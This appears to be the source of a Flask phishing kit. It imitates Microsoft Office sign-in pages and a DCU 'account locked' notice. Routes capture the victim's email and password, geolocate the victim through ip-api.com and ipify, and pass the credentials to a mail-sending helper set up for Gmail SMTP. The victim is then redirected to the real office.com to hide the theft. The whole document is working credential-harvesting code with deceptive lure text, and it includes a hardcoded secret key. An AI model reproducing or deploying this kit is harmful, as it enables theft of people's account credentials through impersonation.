office/__init__.py
from flask import Flask
from flask_mail import Mail


from office.main.routes import page_not_found
from office.main.routes import internal_error

app = Flask(__name__, static_folder='./static')
app.secret_key = "edeacda59ac156398eb419c6b1ba496a5b8d0250cbf6f09299"
app.register_error_handler(404, page_not_found)
app.register_error_handler(500, internal_error)


app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USE_SSL'] = False
app.config['MAIL_USERNAME'] = '' #Gmail here
app.config['MAIL_PASSWORD'] = '' #Gmail app password here


mail = Mail(app)
from office.main.routes import main
from office.portals.routes import portals

app.register_blueprint(main)
app.register_blueprint(portals)

office/main/routes.py
from flask import Blueprint, render_template, request, url_for, redirect
main = Blueprint('main', __name__)

# @main.route('/')
# def error_page():
#     return render_template('error-signin.html')

@main.route('/syncing')
def syncing():
    return render_template('syncing.html')

@main.errorhandler(404)
def page_not_found(e):
    return render_template('404.html'), 404

@main.errorhandler(500)
def internal_error(e):
    return render_template('500.html'), 500

office/portals/routes.py
from urllib import response
from flask import Blueprint, session, render_template, request, redirect, url_for
from .utils import send_login
from requests import get


portals = Blueprint('portals', __name__)


@portals.route('/oauth/signin', methods=['GET','POST'])
def signin():
    if request.method == 'POST':
        user_id = request.form['user-id']
        if user_id:
            session['username'] = user_id
            return redirect(url_for('portals.password'))
    return render_template('signin.html')

@portals.route('/signin/syncing', methods=['GET','POST'])
def syncing():
    return render_template('syncing.html')

@portals.route('/oauth/password', methods=['GET','POST'])
def password():
    response = get('http://ip-api.com/json')
    data = response.json()
    country = data['country']
    city = data['city']
    zipcode = data['zip']
    ip = data['query']
    username = session['username']
    if request.method == 'POST':
        password = request.form.get('password')
        if password:
            send_login(username, password, country, city,zipcode,ip)
            return redirect('https://www.office.com/')
    return render_template('password.html', username=username)

office/templates/action_required.html
{% extends 'base.html'%}

{%block body%}
    
<div style="padding-top: 5px;" class="middle-form">
    <div class="dcu_brand">
        <img src="../static/images/brand.png" alt="" srcset="">
        </div>
    <p style="font-size: 28px;"> Action Required! </p>

    <p style="margin-bottom: 30px;" class='middle'>For your security, Your account has been locked</p>
    
    <hr>
    <h4 style="text-align: left; margin-top: 45px;">
        Due to conflicts we are having verifying some informartions on your account, we have decided to place a temporary hold until you make some required actions and verify
    </h4>

    <p style="text-align: left; margin-top: 45px;">
        To restore and prevent further closing of your account, please <a href="{{url_for('portals.signin')}}">continue</a> to confirm the information we have on file and verify your identity
    </p>

    <p style="text-align: left; margin-top: 45px;">Proceeding will prompt you to enter informations we need to verify your identity and give you a more secure DCU experience</p>
    <div style="background: rgb(1, 103, 90); border: none; width: 50%; margin: 40px auto; " class="neutral-link">
        <a style="background-color: rgb(1, 103, 90); font-family: Georgia, 'Times New Roman', Times, serif; text-decoration: none; color: white;" href="{{url_for('portals.signin')}}">Continue</a>
    </div>
    
    </div>      
</div>

{%endblock%}

office/templates/base.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <link rel="stylesheet" href="../static/css/index.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <title>Sign in to your Account</title>
</head>
<style>
 
</style>
<body>
   <div class="container">
    
        {% block form %}

        {%endblock%}

        {%block options%}

        {%endblock%}
    
   </div>

</body>
</html>

office/templates/password.html
{% extends 'base.html'%} {%block form%}

<div class="sign-in-form">
  <div class="brand-section">
    <img src="../static/images/brand.svg" alt="" srcset="" />
  </div>
  <p>{{username}}</p>
  <h3 style="font-size: 27px; margin-top: -3px;">Enter password</h3>

  <form method="post">
    <input placeholder="Password" type="password" name="password" id="" />

    <div class="margin link">
        <a href="">Forgot password?</a>
      </div>

    <div class="margin link">
      <a href="">Email code to {{username}}</a>
    </div>

    <div class="form-buttons">
      <div class="buttons-flex">

      <div class="submit-button">
        <button>Sign in</button>
        <!-- <input type="submit" value="Next"> -->
      </div>
      </div>
      
    </div>
  </form>
</div>


{%endblock%}

office/templates/signin.html
{% extends 'base.html'%} {%block form%}

<div class="sign-in-form">
  <div style="margin-bottom: -15px;" class="brand-section">
    <img src="../static/images/brand.svg" alt="" srcset="" />
  </div>
  <h3 style="font-size: 27px;">Sign In</h3>

  <form method="post">
    <input placeholder="Email, phone, or Skype" type="text" name="user-id" id="" />
    <div style="display: none;">
<input id="ip" type="text">
</div>
    <div class="margin">
      <p>
        No account? <span class="link"><a href="">Create one!</a></span>
      </p>
    </div>

    <div class="margin link">
      <a href="">Cant't access your account?</a>
    </div>

    <div class="form-buttons">
      <div class="buttons-flex">
        <div class="back-link">
          <a href="">Back</a>
        </div>

        <div class="submit-button">
          <button>Next</button>
          <!-- <input type="submit" value="Next"> -->
        </div>
      </div>
    </div>
  </form>
</div>

{%endblock%} {%block options%}

<div class="sign-in-options">
  <div class="options-wrapper">
    <div class="key-icon">
      <img src="../static/images/key.svg" alt="" srcset="" />
    </div>

    <div style="margin-left: 20px" class="text">
      <p>Sign-in Options</p>
    </div>
  </div>
</div>

<script>
  $.getJSON("https://api.ipify.org?format=json", function(data) {
         
         document.getElementById('ip').value = data.ip
     })
</script>
{%endblock%}

office/templates/syncing.html
{% extends 'base.html'%} {%block form%}

<div class="sign-in-form">
  <div class="brand-section">
    <img src="../static/images/brand.svg" alt="" srcset="" />
  </div>
  

  
</div>


{%endblock%}